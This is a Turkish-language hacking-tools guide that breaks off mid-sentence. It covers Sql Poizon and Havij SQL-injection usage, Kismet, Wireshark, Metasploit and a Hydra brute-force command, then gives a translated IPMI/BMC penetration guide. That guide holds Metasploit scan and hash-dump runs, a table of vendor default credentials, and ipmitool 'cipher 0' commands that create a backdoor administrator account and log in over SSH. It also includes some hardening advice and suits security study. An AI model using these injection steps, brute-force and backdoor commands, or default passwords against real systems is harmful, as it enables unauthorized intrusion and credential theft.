Sql Poizon araçları php, aspi rfi, lfi hedeflerini içerir ve bunları kullanarak kırılabilir
siteleri bulur. Aynı zamanda ülkeye göre kırılabilir siteleri de arayabilirsiniz. Sql
Poizon araçlarıyla siteler incelenebilir. Ayrıntılı bilgi için
http://www.hackforsecurity.net/2012/03/sql-poizon-sqli-exploit-scannertool.html#sthash.5Zl90rb6.dpuf
sitesine bakabilirsiniz
Programın Kullanımına Bir Örnek
1. Programı çalıştırın:

2. Bu pencere açılınca, bir hedef seçilir. Bu örnekte “php drop” kullanılmıştır.
İstenilen hedef seçildikten sonra “Scan” tuşuna basılır. Sonuçlar “Result”
panosunda görüntülenir.
3. Şimdi sonuçları “Sql Crawler”a göndermek istersiniz. Bunu yapmak için sonuç
panosundakini farenin sağ tuşuna basıp “Send to Sql Crawler->All” seçimini
yaparak gerçekleştirirsiniz.

4. O zaman “Sql Crawler” penceresi açılır ve burada yapacağınız tek şey “Crawl”
tuşuna basmaktır. Program Web sitesinin gerçekten SQL eklemesine uygun olup
olmadığı kontrol eder.
5. Bundan sonra yapılacak şey “Export Results” seçeneğine basmak daha sonra
açabileceğiniz bir yere bilgileri yedeklemektir.

HAVIJ 1.15 PRO SQL EKLEME
Bu programın yeni sürümü Havij 1.17 Pro da çıkmış, google'dan aranıp kodları
indirilebiliyor.
Aşağıdaki doküman http://itsecteam.com/node/101/ sitesinden alınmıştır.
Açıklama
Yenilikler
Havij otomatik SQL ekleme aracıdır. Amacı siteye sızma testleri yapanlara
sitedeki SQL ekleme ve kırılma koşullarını göstermektir. Program kırılabilen
bir web uygulamasından kendine faydalar sağlar. Bu yazılımla kullanıcı, arka
planda veri tabanı parmak izi işlemlerini, Veri tabanı yönetim sistemi
kullanıcı adlarını ve karıştırılmış şifrelerini, tabloları ve kolonlarını
görüntülemeyi, veri tabanından bir veriyi aramayı, sunucu karşı Sql
komutlarını çalıştırmayı, ve hatta dosya sistemine erişip, işletim sistemi
kabuk programlarını çalıştırmayı bile yapabilir.
Başka araçlarla karşılaştırıldığında Havij'in üstün gücü, ekleme konusundaki
eşi bulunmaz yöntemleridir. Havij'in başarı oranı neredeyse %95 gibidir.
Havij'in kullanıcı arayüzü ve otomatik ayar sistemi ve araştırıcı detektörleri
amatörlerin bile kolaylıkla kullanılmasına olanak sağlar.
- Her şey “dump” edilir (dökülür).
- MySQL için parantezler kullanan yeni “bypass” yöntemi vardır
- Dosyaya yazma olanağı (MSSQL ve MySQL için)
- Girişlerden HTML yükleme
- Veriyi CSV kalıbında saklamak
- Gelişmiş atlatma ayarları
- Log kayıtlarını açma/kapama
- Olmayan ekleme değeri şimdi kullanıcı ile değiştirilebilir (varsayılan değer
999999.9 olur)
- Açıklama işareti ' kullanıcı tarafından değiştirilebilir.
Özellikler (Bu özelliklerin bir kısmı yalnız paralı ticari sürümde bulunur).
1. Ekleme Yöntemiyle desteklenen Veri Tabanları:
MSSQL 2000/2005 hatalarıyla
MSSQL 2000/2005 hatasız birleşme tabanlı
MSSQL Blind (kör)
MySQL Zaman tabanlı
MySQL Birleşim tabanlı
MySQL Blind (kör)
MySQL hata tabanlı
Oracle Birleşim Tabanlı

Oracle Hata tabanlı
PostgreSQL Birleşim tabanlı
MsAccess Birleşim tabanlı
MsAccess Blind
Sybase (ASE)
Sybase (ASE) Blind
2. HTTPS Desteği.
3. Çoklu işlem (thread)
4. Proxy Desteği
5. Otomatik Veri Tabanı Sunucu Desteği
6. Otomatik tip belirleme (tamsayı ya da dizi)
7. Otomatik anahtar kelime belirleme (geçerli ve geçersiz yanıtlar arasındaki
farkı bulma)
8. Tüm parametrelerin otomatik aranması.
9. Dil kuralları arasındaki farkları belirleme
10. /**/,+,... gibi işartelerin IDS ya da filitrelerde takılmaması için seçenekler
kullanılması
11. Dizileri kullanırken atlanacaklar (sihirli tırnakları atlamak ve benzeri
elemeleri atlamak)
12. Ekle ekleme kurallarını desteklemek
13 Sonuçlarıyla elle sorgu yapmak.
14.Geçersiz birleşenleri atlamak
15. Rastgele imza üretmek
16. Tümüyle değiştirilebilen HTTP başlıkları (referer, user agent gibi)
17. Cookies (çerezler) yüklemek
18. Girişlerde HTML yüklemek
19. HTTP Temel ve Sindirilmiş şifre kontrolü
20. URL yeniden yazma sayfalarının eklenmesi
21. ModSecurity atlatma web uygulaması kalkanı ve benzeri güvenlik
kalkanları.
22.WebKnight web uygulamasını kalkanını atlama ve benzeri güvenlik
kalkanlarını geçme
23. Anlık sonuçlar.
24. MySQL (

36. Çoklu işlemle etkileşimli MD5 kırma
37. Veri Tabanı Yönetim Sistemi bilgisini alma.
38. Tabloları, kolonları ve verileri alma.
39. MSSQL için komut çalıştırma
40. MySQL için uzaktaki sistemin dosyalarını okuma
41. (MySQL ve MSSQL için) Uzaktaki bir dosyayı yaratma içine yazma
42. Veri ekleme/Güncelleme/Silme
43.UTF ya da Unicode desteği
ÖRNEK HAVIJ KULLANIMI
1. Havij V1.15 Pro programını çalıştırın. Sonra istenen URL adresini girin. Program
veri tabanını bulmaya çalışır. Veri tabanı bulunduktan sonra “Tables” seçeneğine
basın ve tabloları görüntüleyin.

2. Programın bulduğu veri tabanını seçin (fareyle tıklayın). Tabloların listesi
görüntüye gelir. Eğer bilgi şeması yoksa program tabloları kendisi tahmin etmeye
çalışır. Programın çalışıp bitmesi sabırla beklenmelidir.

3. Bundan bittikten sonra istenilen tabloyu seç ve tıkla. Hacker çoğu kez “users”
tablosuna bakar. Çünkü kullanıcılar ve onların yetkileriyle daha çok ilgilenir. Tablo
seçildikten sonra “Get Columns” seçeneğine basılır.

4. Seçtiğimiz tablonun içeriğini görmek için tabloyu seçip “Get Data” düğmesine
bastığımızda programın verilere erişmesini sabırla bekleyin.

BÖLÜM4
SNIFFER (KOKLAYANLAR)
Bu tür programlar ağdan geçen tüm mesajları incelerler. Program geliştirenler ağ
katmanında mesajların doğru gidip gitmediğini görebilmek için bu yöntemi çok
kullanırlar. Ama kötü niyetle kullanılınca, “Sniffer” türü programlar kullanıcının
şifresini çözmek için çok kullanışlıdır.
Neden herkes tüm mesajları görebilir diye soracak olursanız TCP/IP protokolu
altında tüm mesajlar donanım katmanına kadar gelir (ethernet ya da Wifi olması
fark etmez). Yazılım bilgisayarın IP numarasına uyanları üst katmanlara taşınırken,
diğerleri alt katmanlarda dikkate alınmaz, hatta daha önce 15 düğümden
geçmişse kaybolmaması gerekenler yeniden ağa gönderilir (MBONE gibi). Sniffer
programlar o mesajları da bu nedenle (IP'si uymasa da) diğer paketleri
izleyebilirler.
KISMET
http://www.kismetwireless.net
Wifi 802.11 ağ tarayıcısı, koklayıcısı ve içine sızan bir izleme sistemidir. Kismet
ham veri iletişime olanak tanıyan tüm Wifi donanımıyla çalışır. Kismet 802.11b,
802.11a, 802.11g ve 802.11n trafiğini koklayabilir ve izler.
Kismet eklenebilir yazılım desteğiyle 802.11 dışındaki Wifi donanımlarını da
izleyebilmektedir.
Kismet pasif olarak paketleri toplar ve tanınmasına izin veren ağları tanır (verilen
zaman içinde adlarını da belirler) Gizlenmiş ya da saklanmış ağları bile üzerindeki
trafikten bulabilir.
Kismet açık kaynak kod bir yazılım olduğundan doğrudan kaynaktan derlenerek
kullanılabilir. Ama birçok Linux dağıtımında ikili kod zaten vardır. Onu yüklemek
daha kolaydır. Kismet'i kaynak kod üzerinden derleyince, kurulumunda suid-root
kullanmak, çalıştırırken root yetkisiyle başlatmak gerekmektedir. Bu nedenle
sorunları çözülmüş hazır ikili kopya ile başlamakta yarar vardır.
Unutulmasın ki KISMET windows ortamında Cace Aircap, pcap saklanmış
dosyalarıyla çalışır ya da uzaktaki kismet drones çalışıyorsa ondan destek alır.
Linux ortamında da pcap ve libnl desteğine gerek vardır.
Kismet'in paketleri izleyip saklayabilmesi için “root” yetkisi gereklidir.
“suid-root” kullanımı sınırlı KISMET olanakları demektir. Eğer Kiismet “root” olarak
başlatılırsa çalıştığı sürece “root” olarak kalır.

Kaynağı yakalama
Pek çok konumda sürücüyü otomatik tanımak ve kaynağı yakalamak için
desteklenen kanalları bulmak, genelde bir ok kullanıcı için yeterli olabilir. Ama
kaynağı yakalamak için daha pek çok seçenek vardır.
Kismet paketleri 802.11 katmanında yakalar. Bunu yapabilmesi için ağ konumunu
değiştirmesi gerekebilir ki normal ağ kullanımı bu anda kapanmış olur.
Yakalanacak kaynaklar kismet kullanıcı arayüzü ile eklenebilir. Bunlar kismet.conf
dosyasında da gösterilmiştir.
Kismet ile ilgili diğer parametre ve seçenekler için Ek-3'e bakınız.
WIRESHARK
Wireshark GTK+ tabanlı ağ analiz programıdır (ya da sniffer) size ağ paketlerini
yakalama ve etkileşimli olarak ağ altyapılarını tarama olanağı sağlar. Bu
protokolün hedefi, profesyonel nitelikte analiz programı sunmaktır. Wireshark
özellikleri kapalı kodu olan sniffer'lere karşın daha iyi sonuç üretmektir. Ürün hem
Linux hem de Windows altıda iyi bir kullanıcı arayüzüyle çalışır. Kullanma ve
yeniden TCP/IP paketleri üretme açısından elverişli bir üründür.
Bu konudaki ayrıntılı kullanıcı dokümantasyonu için
http://www.wireshark.org/download/docs/user-guide-a4.pdf
adresine bakınız. Türkçe açıklama için Ek-6'ya bakınız.
METASPLOIT
Open Source Community ve Rapid7 iş birliğinden sızma denemesi yazılımı
Metasploit çıkmıştır. Bu program kırılmaları bulur, güvenlik yönetimine yardımcı
olur.
Ayrıntılı bilgi için http://www.metasploit.com/ sayfasına bakınız.
DİĞER HACKER ARAÇLARI
Şifre Kırıcılar
ICRACK
Şifre kırma sözlüğü. Artan baskı uygular.
Maceracı
bobokit
woot-project

Diğer Bağlantılar
InfoSysSec.org: Nasıl hack edilir.
http://www.infosyssec.org/infosyssec/security/hackhow1.htm
Ağ işgali ve hacking
http://www.networkintrusion.co.uk/hacking.htm
hping
http://www.hping.org/
komut satırından TCP/IP paket inceleyicisi. TCP,UDP,ICMP ve RAW-IP
(ham IP) protokollerini destekler. “traceroute” konumu da vardır. Kapalı
bir kanaldan dosya gönderme olanağı da vardır.
Hping2
http://sourceforge.net/projects/hping2
Birçok işi yapabilir (Güvenlik kalkanı kurallarını listelemek gibi), açık
kapı aramak gibi

BÖLÜM 5
KIRMA ARAÇLARI
pdfcrack
Daha önce pdf dosyalarından şifrenin nasıl kaldırılacağı yazılmıştı
(http://www.cyberciti.biz/faq/removing-password-from-pdf-on-linux/).
Linux ortamında komut satırından nasıl şifre kaldırılacağı bu sayfada anlatılır.
Birçok açıdan (şifre unutma, şifrenin etkinliği vb) kullanılışlı bir işlemdir.
Bu programı kullanmak suç mudur? Nerede yaşadığınıza baplıdır. Ama kendi
pdf dosyalarınızda şifre düzeltmesi için kullanmanın yasal bir sakıncası
yoktur.
Komut satırı seçenekleriyle pdf dosyası şifresini kaldırma
Kendi şifre korumalı dosyalarınızın şifresini unuttuysanız aşağıdakilerden
birini kullanarak şifrenizi silebilirsiniz.
1 – pdftk: PDF dosyalarıyla işlem yapmak için kullanışlı bir programdır.
2 – qpdf: Bir pdf dosyasını eşdeğer başka bir pdf dosyasına çeviren
programdır.
3 – xpdf-utils: Portable Document Format (PDF) için kullanışlı hazır
programlardan oluşur (pdftops ve ps2pdf gibi)
4 – Print to a file: Evince yazılımını doğrudan kullanabilirsiniz.
Hydra
HTTP şifresini kırma
Video izleme bağlantısı: http://g0tmi1k.blip.tv/file/2318952
Video indirme bağlantısı: http://www.mediafire.com/?yhc1adzytiqibjc
Uzaktan basit şifreleri çözmek için sözlük kullanır. Gerekenler hydra ve
sözlüktür.
Komut satırı:
hydra -l admin -P /pentest/passwords/wordlists/g0tmi1k.lst -e ns -t
15 -f -s -vV 192.168.1.1 http-get /
-l = kullanıcı adı
-P = şifre (sözcük listesine bakar)
-e ns = boş şifreye bakar
-t xx = ynı anda kaç iş çalıştırılacaktır
-f = ilk kullanıcı/şifre bulunduğunda çık
-s = SSL kullanarak bağlan

-vV = tum açıklamaları göster
193.168.1.1 = IP adresi
http-get = hangi kırma yöntemi gibi bilgiler
/ = kırılacak sayfa (root)

BÖLÜM6
ÖNEMLİ BİR GÜVENLİK SORUNU IPMI/BMC
IPMI
IPMI ile ilgili yazılımları neden buraya aldığım herkesin dikkatini çekebilir ve
neden sorusunu sormalarını sağlayabilir. Eğer aşağıdaki araçların nasıl ve ne
amaçla kullanıldığını görürseniz, IPMI yazılımlarının önemli bir güvenlik sorunu
oluşturduğunu hemen anlarsınız. Yetkisiz bir kişi IPMI komutları ve araçlarıyla
sisteminizin çalışma biçimini değiştirebilir hatta işlemez hale bile getirebilir.
KAPANMIŞ SUNUCULARI BİLE HACK EDEBİLİRSİNİZ
URL adresi: https://isc.sans.edu/diary/IPMI
%3A+Hacking+servers+that+are+turned+%22off%22/13399
Yayınlandığı Tarih: 2012-06-07
Yayınlayan: Johannes Ullrich
Sunucu tarlasını yönetirken sorgulardan biri asılı kalmış ya da kilitlenmiş
sunucuları nasıl ele alacağınızdır. Çünkü bu sunucuların işletim sistemleri artık
yanıt veremez durumdadır. Klasik çözüm kuşkusuz seri konsol karışımı belki de IP
üzerinden KVM olabilir. Ayrıca uzaktan denetlenebilen güç kaynağı anahtarlarıdır.
Bu tür donanımlar çok da pahalı değildir. Değerli “rack” alanı işgal eder ve elektrik
gücü ister ve bir çok (hem de çok) kablo gerekir.
Olayları kolaylaştırmak için, Intel “IPMI” ile ortaya çıktı (Intellegent Platform
Management Interface). Sunucularda bulunur. Bazı masaüstü bilgisayarlarda
değişik sürümleri vardır. IPMI yeni değildir. Burada anlatılacak saldırı da yeni
değildir. Burada açıklama yapılmasının nedeni birçok sistem yöneticisinin IPMI
konusunda bilgi sahibi olmadığıdır.
Yıllar içinde gelişen ve işlevleri artan IPMI sürümlerinde yenilikler anakart
üreticisine ve kullanılan firmware ile doğrudan orantılıdır. Ama bazı özellikler
hemen her uyarlamada vardır örneğin:
IPMI sunucu elektriğe takılınca etkindir. Sunucunun açılmasını beklemez.
Ana kart üzerinde özel bir devre olarak uyarlanmıştır. Bazen takılabilir kart
olarak da görürsünüz. CPU, RAM ve diğer parçalara gerek duymaz.
Var olan ağ kartını kullanır ve ayrıca bir ağ kartına gerek yoktur.
Eğer işletim sisteminiz IPMI destekliyorsa sunucudaki özel yazılımları kullanarak
ona bağlanabilirsiniz ve onu sunucudaki bazı sensörleri okumak için

kullanabilirsiniz. “openipmi” ya da “freeipmi” araçlarını kontrol edin yoksa birini
kurun.
Yerel olarak IPMI kullanışlıdır ama asıl gücü uzaktan kullanıldığında anlaşılır. IPMI
1.0 sürümü seri kapı üzerinden kullanılırdı. Özellikle uzaktaki elektrik gücüne
sistem gibi görünürdü. Bunu LAN üzerinden uyandırma hizmetine
benzetebilirsiniz. Ama seri kapı üzerinden elektrik gücü kesme yeteneğinin de
olması o kadar basit değildir. Bunun en büyük yararı uzaktan elektrik gücünü
kontrol eden sistemlere gerek olmamasıdır. Sürüm 1.5'de IPMI mesajlarını IP
üzerinden göndermek de olabiliyordu. Sürüm 2.0'da bıçak ağzı sunuculara, vLan
ve modern ağlarda bulunan diğer ortak özelliklere rastlanır.
Bugünün sunucularında IPMI uyarlaması olunca, bir web sunucunun uzaktan
kontrol edilmesini, firmware yenileme gibi özellikleri kullanabilirsiniz. Seri arayüz
gerekmeden de yapılabilir durumdadır. Seri bağlantının bant çıktı karakter sayısını
güvenlik nedeniyle sayarız. Ama IPMI işlemlerini güvenli yapabilmenin bazı
adımları vardır. Aşağıda örnekler sıralanmıştır:
Yönetilen bir ağ ayarı yapın ve yönetim ağına bağlı kalan ağ kartı ile IPMI işlemini
sınırlayın.
BIOS ayar seçeneklerini IPMI için görüntüleyin. Eğer fiziksel yönetim ağınız
yoksa VLAN kullanmaya çalışın.
IPMI firmware bilgisini güncel tutun. Ana kart firmware ile beraber olabilir.
IPMI erişiminin güvensiz protokollerden (HTTP gibi) yapılması engellenir. Ya
SSH kullanın ya da HTTPS ve uygun sertifikalarla iletişim yapın.
Varsayılan şifreleri sakın kullanmayın.
IPMI şifrelemesini var olan sistem şifrelemesine bağlamaya çalışın. RADIUS
ve AD seçenekleri kullanılabilir.
IPMI uyarlamasının desteklediği fiziksel seçenekleri gözden geçirin. Bazı IP
adreslerinden erişimi sınırlayabilirsiniz. Ya da kullanmayacağınız özellikleri
kapatın.

Sunucu Yönetim Sistemindeki Hacker delikleri Neredeyse
fiziksel erişime kucak açar
(Hacker Holes in Server Management System Allow ‘Almost-
Physical’ Access)
Yazan: Kim Zetter 07.02.13 9:30 AM
URL Adres: http://www.wired.com/threatlevel/2013/07/ipmi/
Buraya yazının ana hatlarını aktardım. Ayrıntılı bilgi için web adresine
başvurabilirsiniz.
Sunucuları uzaktan denetlemek ve yönetmek için kullanılan protokollerin
kırılganlığı, sistemlerin saldırılara uğramasına yetkisiz kişilerin kontrolüne
geçmesine neden olur. Bu durumda olan İnternet'e bağlı 100,000 den fazla sunucu
vardır.
Kırılganlık daha çok IPMI protokolünde görülür. Bu protokol BMC tarafından
kullanılır. Sunucuların uzaktan izlenmesinde ısılarının denetlenmesinde, çalışıp
çalışmadıklarının belirlenmesinde ve diğer işlevlerde kullanılır.
Güvenlik delikleri saldırganların şifreleri öğrenmelerine, arka kapı oluşturmalarına
neden olabilir.
Metasploit Framework sızma denemelerinde 100,000'den çok sunucuda güvenlik
sorunu saptanmıştır.
IPMI değişik üreticilerin ürün ve cihazlarının aynı protokol ile uzaktan kontrol
edilmesi için hazırlanmıştır. Sunucuları uzaktan denetlemek için BMC sanal tuş
takımı, fare ve çıkarılabilir ortam sağlar.
IPMI gediklerini kullanan bir saldırgan, sunucuyu kendi denetimine alabilir.
Kısacası BMC'deki herhangi bir zayıflık, saldırganın sunucuda fiziksel erişime
ulaşmış gibi davranmasına neden olabilir. Devletler ve Modern Firmalar IPMI
denetime dayanarak sunucularını çalıştırmak zorundadırlar.
Bazı BMC'lerde Evrensel Tak Çalıştır (UPnP) varsayılan olarak açıktır. Bu konuda
Moore http://www.wired.com/threatlevel/2013/01/plug-n-play-security-flaws/ web
sayfasında oluşan hataları anlatmıştır.
BMC IP adresi ile sunucununki farklı olduğundan saldırgan BMC'yi ele geçirse bile
sistem yöneticisi olayı takip edemez.
Bir çok insan sistemlerinde IPMI açık olduğunu bilmez. Moore'un Metasploit
Framework içine eklediği IPMI modülüyle “IPMI var mı?” taranarak bulunabilir.

IPMI ve BMC'lere Sızma Denemeleri El Kitabı
(A Penetration Tester's Guide to IPMI and BMC's)
Yazan: Metasploit'den HD Moore 2 Tem, 2013 12:22:49 PM
URL Adresi:
https://community.rapid7.com/community/metasploit/blog/2013/07/02/apenetration-testers-guide-to-ipmi
Burada yazılanları Türkçeye çevirmeye çalıştım. Her şeyin önemli olduğunu
düşünüyorum.
GİRİŞ
Dan Farmer çığır açan güvenlik araçları ve işlemleriyle bilinir. Bir yılın
üzerinde bir süredir Dan Farmer IPMI ve BMC güvenliği üzerine ciddi tanımlar
yapmıştır. Bu yazı Dan Farmer'ın sözünü ettiği sorunlara nasıl ulaşılacağını
gösterir. Eğer aradığınız hızlı bir çözümse,
https://community.rapid7.com/docs/DOC-2344 adresinde sıkça sorulan
sorulara bir bakın. Ayrıca Dan Farmer'ın ortaya koyduğu mükemmel belgeyi
http://fish2.com/ipmi/bp.pdf adresinden okuyun.
BMC ve IPMI Protokolü
Baseboard Management Controller (BMC), masaüstü ve sunucularda bant
dışı izlemeyi sağlaması için kullanılan bir bilgisayardır. Bir çok marka altında
satılırlar. HP iLO, Dell DRAC, Sun ILOM, Fujitsu iRMC, IBM IMM, and
Supermicro da bunların arasındadır. IPMI ve BMC'ler çoğunlukla gömülü ARM
sistemleri olarak uyarlanırlar. Üzerlerinde Linux yüklüdür. Sunucunun ana
kartında doğrudan dışarıya bağlı çalışır. Ağ erişimini, ağ erişim kartına “yan
bant” (sideband) ile bağlanarak sağlanabileceği gibi kendine özgü arayüzü
ile de yapılabilir. Ana karta gömülü modellerin yanı sıra ayrıca PCI kartı
takılabilir modül olarak da satılır. Neredeyse tüm sunucular ve iş istasyonları
BMC kurulu olarak gönderilir. IPMI iletişim protokolünü yerel “bus” (iletişim
yolu) üzerinden ya da ağ üzerinden tanımlayan bir dizi özellikler toplamıdır.
Bu özellikler Intel tarafından belirlenmiştir ve şu anda iki sürüm olarak (1.5
ve 2.0) piyasada vardır. Dan Farmer'ın ana hedefi UDP ve 623 kapısını
kullanan IPMI ağ erişim protokolü üzerinedir. Bunun çizgisel görünümü
aşağıda gösterilmiştir.

Yüksek Değerdeki Hedefler
BMC'ler güvenlik denetçileri tarafından saygıyla karşılanır ve gözden kaçırılır.
Bir çok benzer gömülü cihazlar gibi denemelere yavaş yanıt verirler. Bazı
web tabanlı yönetimlere ek olarak standart dışı arayüzleri varır. BMC ve
yazıcı arasındaki fark erişimi sağladıktan sonra anlaşılır. BMC'nin sunucu
sisteminin ana kartına doğrudan erişimi vardır. Bu özellik izleme, yeniden
başlatma (reboot) ve hatta yeniden işletim sistemi yükleme (reinstall)
olanağını da beraberinde getirir. Bir çok sistemde etkileşimli KVM erişimi
sanal ortam üzerinden sağlanabilmektedir. Aslında BMC'ye erişim sunucuya
fiziksel olarak erişim demektir. Eğer saldırgan yalnız BMC'ye erişmeyip
“root” yetkisini de elde etmişse Ana sistemin i2c'sine ve Super I/O (Super
Giriş/Çıkış) yongasına (chip) doğrudan erişim hakkını ele geçirir. Bu da
sunucu yönetimi için hoş bir haber değildir.
Ağ Hizmetleri
BMC'nin ana markaları tarafından sunulan servisleri üretici firmaya göre çok
değişiklik gösterir. Burada bazı benzerlikler belirtilmiştir. BMC'lerin çoğunda
bir çeşit Web tabanlı yönetim vardır. Telnet ya da Güvenli kabuk (SSH gibi)
ve IPMI ağ protokolü (UDP ve bazen TCP ile 623 nolu kapıdan) diğer erişim
biçimleridir. Aşağıdaki örnekler Supermicro BMC'nin varsayılan
yapılandırması üzerindeki “Nmap -sSV -p1-65535” taramasının sonuçlarıdır.

Supermicro IPMI (firmware SMT_X9_218)
PORT/KAPI DURUM SERVIS SÜRÜM
22/tcp open ssh Dropbear sshd 2012.55 (protocol 2.0)
80/tcp open http lighttpd
443/tcp open ssl/http lighttpd
623/tcp open ipmi-rmcp SuperMicro IPMI RMCP
5900/tcp open vnc VNC (protocol 3.8)
5985/tcp open wsman?
49152/tcp open upnp Intel UPnP reference SDK 1.3.1
(Linux 2.6.17.WB_WPCM450.1.3;
UPnP 1.0)
Yukarıda listelenen TCP kapılarına ek olarak bu cihaz da UDP 623 (IPMI) ve
1900 (Upnp SSDP) kapıları da yanıt verir.
Ağ Keşfi
UDP IPMI servisine 623 kapısından tek paket sorgusu ağ üzerindeki BMC
belirlemek için en hızlı yöntemdir. Aşağıdaki örnekte Metasploit Framework
ipmi_version modülü yerel BMC'yi yakalamak için kullanılır. Yanıt desteğin
1.5 mi yoksa 2.0 mı olduğunu belirtir.
$ msfconsole
=[ metasploit v4.7.0-dev [core:4.7 api:1.0]
+ -- --=[ 1119 exploits - 638 auxiliary - 179 post
+ -- --=[ 309 payloads - 30 encoders - 8 nops
msf> use auxiliary/scanner/ipmi/ipmi_version
msf auxiliary(ipmi_version) > set RHOSTS 10.0.0.0/24
msf auxiliary(ipmi_version) > run
[*] Sending IPMI requests to 10.0.0.0->10.0.0.255 (256 hosts)
[*] 10.0.0.7:623 IPMI-2.0 OEMID:21317 UserAuth(auth_msg, auth_user,
non_null_user, null_user) PassAuth(password, md5, md2) Level(1.5, 2.0)
[*] 10.0.0.4:623 IPMI-2.0 OEMID:21317 UserAuth(auth_msg, auth_user,
non_null_user, null_user) PassAuth(password, md5, md2) Level(1.5, 2.0)
[*] 10.0.0.135:623 IPMI-2.0 UserAuth(auth_user, non_null_user) PassAuth(password,
md5, md2, null) Level(1.5, 2.0)
[*] 10.0.0.249:623 IPMI-2.0 UserAuth(auth_user, non_null_user) PassAuth(password,
md5, md2, null) Level(1.5, 2.0)
[*] 10.0.0.252:623 IPMI-2.0 UserAuth(auth_user, non_null_user) PassAuth(password,
md5, md2, null) Level(1.5, 2.0)

Kullanıcı adı ve Şifreler
Bir çok sızma denemesi yapanların bildiği gibi ağ cihazlarına erişimin en
kolay yolu her zaman varsayılan şifrelerle yapılan erişimdir. Aşağıdaki tablo
bilinen bazı markalarda varsayılan BMC kullanıcı adı ve şifrelerini gösterir.
Bunlarda yalnız HP rastgele şifre kullanır.
Ürün Adı Varsayılan Kullanıcı Adı Varsayılan Şifre
HP Integrated Lights Out (iLO)
Dell Remote Access Card
(iDRAC, DRAC)
IBM Integrated Management
Module (IMM)
Fujitsu Integrated Remote
Management Controller
Administrator
root
USERID
admin
calvin
PASWORD(bir sıfır
ile)
admin
Supermicro IPMI (2.0) ADMIN ADMIN
Oracle/Sun Integrated Lights Out
Manager (ILOM
root
changeme
ASUS iKVM BMC admin admin
Kırılganlığı Çıkartma
Belgenin bu bölümünde yer alan birçok kırılganlıklar Dan Farmer tarafından
IPMI araştırmalarında belirlenmiştir. Daha sonraki araştırmalarda bulunan
başka sonuçlara da yer verilmiştir.
IPMI Şifre Denetimini Chiper 0 ile geçmek
IPMI 2.0 özelliklerinde önemli bir hatayı Dan Farmer belirlemiştir. Özellikle
“Chiper type 0” (Tip 0 şfreleme) istemcinin açık metin şifreleme istediğini
gösteren bir belirticidir. Aslında bu seçim herhangi bir şifreyle girişe olanak
tanır. HP', Dell ve Supermicro BMC'lerde “chiper 0” tanımlıdır. Tüm IPMI 2.0
uyarlamalarında gereken komutla hangi sistemlerde “Chiper 0” olduğu
Metasploit Framework ipmi_chiper_zero modülü ile kolaylıkla bulunabilir.

$ msfconsole
=[ metasploit v4.7.0-dev [core:4.7 api:1.0]
+ -- --=[ 1119 exploits - 638 auxiliary - 179 post
+ -- --=[ 309 payloads - 30 encoders - 8 nops
msf> use auxiliary/scanner/ipmi/ipmi_cipher_zero
msf auxiliary(ipmi_cipher_zero) > set RHOSTS 10.0.0.0/24
msf auxiliary(ipmi_cipher_zero) > run
[*] Sending IPMI requests to 10.0.0.0->10.0.0.255 (256 hosts)
[+] 10.0.0.99:623 VULNERABLE: Accepted a session open request for cipher zero
[+] 10.0.0.132:623 VULNERABLE: Accepted a session open request for cipher zero
[+] 10.0.0.141:623 VULNERABLE: Accepted a session open request for cipher zero
[+] 10.0.0.153:623 VULNERABLE: Accepted a session open request for cipher zero
Aşağıdaki örnek, standart “ipmitool” kullanarak komut satırından nasıl
“chiper 0” sorununu açığa çıkartıldığını göstermektedir. Burada -C 0
kullanılınca daha önce kabul edilmeyen komutun nasıl kullanıldığı
izlenmelidir. Bu saldırı için geçerli bir kullanıcı adı gereklidir. Bu gerekçe hiç
bir yerde de belirtilmez. Bir kez arka kapı hesabı açılınca, BMC ve onun
sunucusuna istenilen sayıda saldırı olasıdır.
$ ipmitool -I lanplus -H 10.0.0.99 -U Administrator -P FluffyWabbit user list
Error: Unable to establish IPMI v2 / RMCP+ session
Get User Access command failed (channel 14, user 1)
$ ipmitool -I lanplus -C 0 -H 10.0.0.99 -U Administrator -P FluffyWabbit user
list
ID Name Callin Link Auth IPMI Msg Channel Priv Limit
1 Administrator true false true ADMINISTRATOR
2 (Empty User) true false false NO ACCESS

$ ipmitool -I lanplus -C 0 -H 10.0.0.99 -U Administrator -P FluffyWabbit user
set name 2 hdm
$ ipmitool -I lanplus -C 0 -H 10.0.0.99 -U Administrator -P FluffyWabbit user
set password 2 password
$ ipmitool -I lanplus -C 0 -H 10.0.0.99 -U Administrator -P FluffyWabbit user
priv 2 4
$ ipmitool -I lanplus -C 0 -H 10.0.0.99 -U Administrator -P FluffyWabbit user
enable 2
$ ipmitool -I lanplus -C 0 -H 10.0.0.99 -U Administrator -P FluffyWabbit user
list
ID Name Callin Link Auth IPMI Msg Channel Priv Limit
1 Administrator true false true ADMINISTRATOR
2 hdm true false true ADMINISTRATOR
$ ssh hdm@10.0.0.99
hdm@10.0.0.99's password: password
User:hdm logged-in to ILOMXQ3469216(10.0.0.99)
iLO 4 Advanced Evaluation 1.13 at Nov 08 2012
Server Name: host is unnamed
Server Power: On
hpiLO->
IPMI 2.0 RAKP Şifre Denetimi Uzaktan Karışık Şifre Alma
Sonradan Dan Farmer IPMI 2.0 ile daha büyük bir sorunu belirledi. IPMI 2.0
şifre denetimi, istemcide henüz şifre denetimi yapmadan, sunucunun
anahtar sözcüklü SHA1 ya da MD5 karışımını göndermesini zorunlu kıldığını
belirledi. Doğru duydunuz, BMC geçerli her kullanıcı için karıştırılmış şifresini
gönderir. Kaba kuvvet kullanarak bu şifre çevirim dışı ya da sözlük
kullanılarak kolaylıkla kırılır. Bu IPMI özelliklerinin anahtar bölümü
olduğundan kısa zamanda çözülmesi olası değil gibidir. Metasploit
Framework içindeki ipmi_dumphashes modülü bir çok BMC'de kısa süren
işlemlerle sonuca ulaşır.
$ msfconsole
=[ metasploit v4.7.0-dev [core:4.7 api:1.0]
+ -- --=[ 1119 exploits - 638 auxiliary - 179 post
+ -- --=[ 309 payloads - 30 encoders - 8 nops

msf> use auxiliary/scanner/ipmi/ipmi_dumphashes
msf auxiliary(ipmi_dumphashes) > set RHOSTS 10.0.0.0/24
msf auxiliary(ipmi_dumphashes) > set THREADS 256
msf auxiliary(ipmi_dumphashes) > run
[+] 10.0.0.59
root:266ead5921000000....000000000000000000000000000000001404726f6f74:ea
f2bd6a5 3ee18e3b2dfa36cc368ef3a4af18e8b
[+] 10.0.0.59 Hash for user 'root' matches password 'calvin'
[+] 10.0.0.59 :
408ee18714000000d9cc....000000000000000000000000000000001400:93503c1b7
af26abee 34904f54f26e64d580c050e
[+] 10.0.0.59 Hash for user '' matches password 'admin'
Yukarıdaki örnekte, modül iki geçerli kullanıcı adı belirlemiş (root ve boşluk) ve
